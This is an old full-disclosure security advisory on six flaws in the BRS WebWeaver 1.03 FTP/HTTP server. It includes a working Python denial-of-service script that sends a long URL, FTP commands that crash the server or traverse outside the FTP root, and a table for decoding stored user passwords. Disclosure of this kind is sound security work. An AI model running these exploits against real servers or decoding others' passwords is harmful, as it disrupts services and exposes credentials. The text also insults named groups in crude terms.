=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: BRS WebWeaver: full disclosure product: BRS WebWeaver 1.03 vendor: http://www.brswebweaver.com risk: high date: 31/03/2k3 tested platform: Windows 98 Second Edition discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/019.en.txt http://f0kp.iplus.ru/bz/019.ru.txt contact email: euronymous@iplus.ru =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= Issues ------ 1. Dos Device Path vulnerability in FTP Server 2. Long URL DoS in HTTP Server 3. Weak Encryption Sheme 4. Remote System Information Gathering 5. Path Disclosure in FTP Server 6. Directory Traversal in FTP Server 1. Dos Device Path vulnerability in FTP Server ---------------------------------------------- i have found, that FTP server doesnt checks path, typed by user. malicious local user can crash FTP (and HTTP also) server on non-patched Windows98 machine. just type this command in WebWeaver ftp session: cd /aux/aux/ After this server goes down.. Solutions: 1) Apply corresponding patch for your windows 2) Wait for new version of WebWeaver 3) Remove this crap at all )) 2. Long URL DoS in HTTP Server ------------------------------ If any local/remote user pass to http server url, that contain 2499361 charakters, then server was crashed in 2-5 minutes. It will eat all RAM and finally hang up whole system. Need to reboot. Exploit as below: }------- start of fWWhtdos.py ---------------{ #! /usr/bin/env python ### # WebWeaver 1.03 Http Server DoS exploit # by euronymous /f0kp [http://f0kp.iplus.ru] ######## # Usage: ./fWWhtdos.py target # Ex.: ./fWWhtdos.py 127.0.0.1 ######## import sys, httplib target = sys.argv[1] spl = "f"*2499361 conn = httplib.HTTPConnection(target) conn.request("GET", "/"+spl) r1 = conn.getresponse() print r1.status }--------- end of fWWhtdos.py ---------------{ following is appear in error.log of WebWeaver: }-------------------------- start of error.log ------------------------{ 31/Mar/2003:04:28:52 LOG_ALERT ERROR: Thread Manager TerminateThreads Timed Out 31/Mar/2003:04:28:52 LOG_ALERT ERROR: Thread Manager TerminateThreads Timed Out 31/Mar/2003:04:28:52 LOG_WARNING Admin Thread NOT Stopped! NOT ASSIGNED! }--------------------------- end of error.log -------------------------{ Solutions: 1) Wait for new version of WebWeaver 2) Remove this crap at all )) 3. Weak Encryption Sheme ------------------------ Webweaver `encrypt' ftp-users passwords and all password hashes stored in \config\users.ini file under WebWeaver installation directory. Data is stored in following format: user=hashed_passwd Passwords arent case-sensivity for WebWeaver. Below you can see encryption table: g i k m o q s u w e == encrypted 1 2 3 4 5 6 7 8 9 0 == plain з у П й н ч п Ч г е ╩ ? == encrypted q w e r t y u i o p [ ] == plain З л Н С У Х Щ Ы Э { S == encrypted a s d f g h j k l ; ' == plain щ х Л с Й б Я ] a c == encrypted z x c v b n m , . / == plain Any local user can to get this file [users.ini] and `decrypt' user passwords. Solutions: 1) Wait for WebWeaver vendor implement strong encryption sheme like MD5 and BlowFish. 2) Remove this crap at all )). 4. Remote System Information Gathering -------------------------------------- Any remote user can get many useful information about system, where BRS WebWeaver is installed. If within installation procedure test cgi scripts was installed [in default], then it will enough to go to this url: http://hostname/scripts/testcgi.exe }--------------- start of testcgi.exe output ---------------{ CGI Test Program Arguments To Testcgi Argument 1 : Environment Variables HTTP_CONNECTION = keep-alive HTTP_KEEP_ALIVE = 300 HTTP_ACCEPT_CHARSET = utf-8,* HTTP_ACCEPT_ENCODING = gzip,deflate,compress;q=0.9 HTTP_ACCEPT_LANGUAGE = ru-ru,ru;q=0.5 HTTP_ACCEPT = text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1 HTTP_USER_AGENT = Mozilla/5.0 (Windows; U; Win98; ru-RU; rv:1.3) Gecko/20030309 HTTP_HOST = localhost SERVER_PORT = 80 URL = /scripts/testcgi.exe LOCAL_ADDR = 195.***.**.** CONTENT_LENGTH = 0 SERVER_SOFTWARE = BRS WebWeaver/1.03 SERVER_PROTOCOL = HTTP/1.0 SERVER_NAME = ******30 REMOTE_HOST = 127.0.0.1 REMOTE_ADDR = 127.0.0.1 REQUEST_METHOD = GET DOCUMENT_ROOT = c:\program files\webweaver SCRIPT_NAME = /scripts/testcgi.exe GATEWAY_INTERFACE = CGI/1.1 WINDIR = C:\WINDOWS CMDLINE = WIN COMSPEC = C:\WINDOWS\COMMAND.COM PATH = C:\WINDOWS;C:\WINDOWS\COMMAND WINBOOTDIR = C:\WINDOWS PROMPT = $p$g TEMP = C:\WINDOWS\TEMP TMP = C:\WINDOWS\TEMP Miscellaneous Information Working directory: C:/Program Files/WebWeaver/scripts/ Current date and time: 2003/03/31 5:07:32 }--------------- end of testcgi.exe output ---------------{ Solution: Remove this script from /scripts/ directory. 5. Path Disclosure in FTP Server -------------------------------- I wrote about this vulnerability in v1.01 of WebWeaver already: http://f0kp.iplus.ru/bz/012.en.txt It was published in Bugtraq mailing list, but in v1.03 this flaw else doesnt was fixed. }-------------- sample session -----------{ 220 BRS WebWeaver FTP Server ready. User (********.***.*****.***:(none)): 123 331 Password required for 123. Password: 230 User 123 logged in. ftp> pwd 257 "/" is current directory. ftp> mkdir test 257 '/test': directory created. ftp> mkdir test 550 'c:\ftp\test': can't create directory. ftp> rmdir test 250 '/test': directory removed. ftp> rmdir test 550 'c:\ftp\test': no such directory. ftp> }-------------- sample session -----------{ So, if user make attempt to create already existent directory or remove unexistent directory, then Ftp server will output full system path. Solutions: 1) Wait for new version of WebWeaver 2) Remove this crap at all )) 6. Directory Traversal in FTP Server ------------------------------------ I wrote about this vulnerability in v1.01 of WebWeaver already: http://f0kp.iplus.ru/bz/012.en.txt It was published in Bugtraq mailing list, but in v1.03 this flaw else doesnt was fixed. }-------------- sample session -----------{ 220 BRS WebWeaver FTP Server ready. User (********.***.*****.***:(none)): 123 331 Password required for 123. Password: 230 User 123 logged in. ftp> pwd 257 "/" is current directory. ftp> mkdir ../test 257 '/..\test': directory created. ftp> rmdir ../test 250 '/..\test': directory removed. ftp> mkdir ../windows/test 257 '/..\windows\test': directory created. ftp> rmdir ../windows/test 250 '/..\windows\test': directory removed. ftp> }-------------- sample session -----------{ How you can see any user can exploit this traversal bug for creating and removing directories outside ftp_root. But user cannot use more useful commands like `ls', `dir'. Solutions: 1) Wait for new version of WebWeaver 2) Remove this crap at all )) shouts: R00tC0de, DWC, DHG, HUNGOSH, security.nnov.ru, all russian security guyz!! to kate especially )) f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb f*cking team ================ im not a lame, not yet a hacker ================
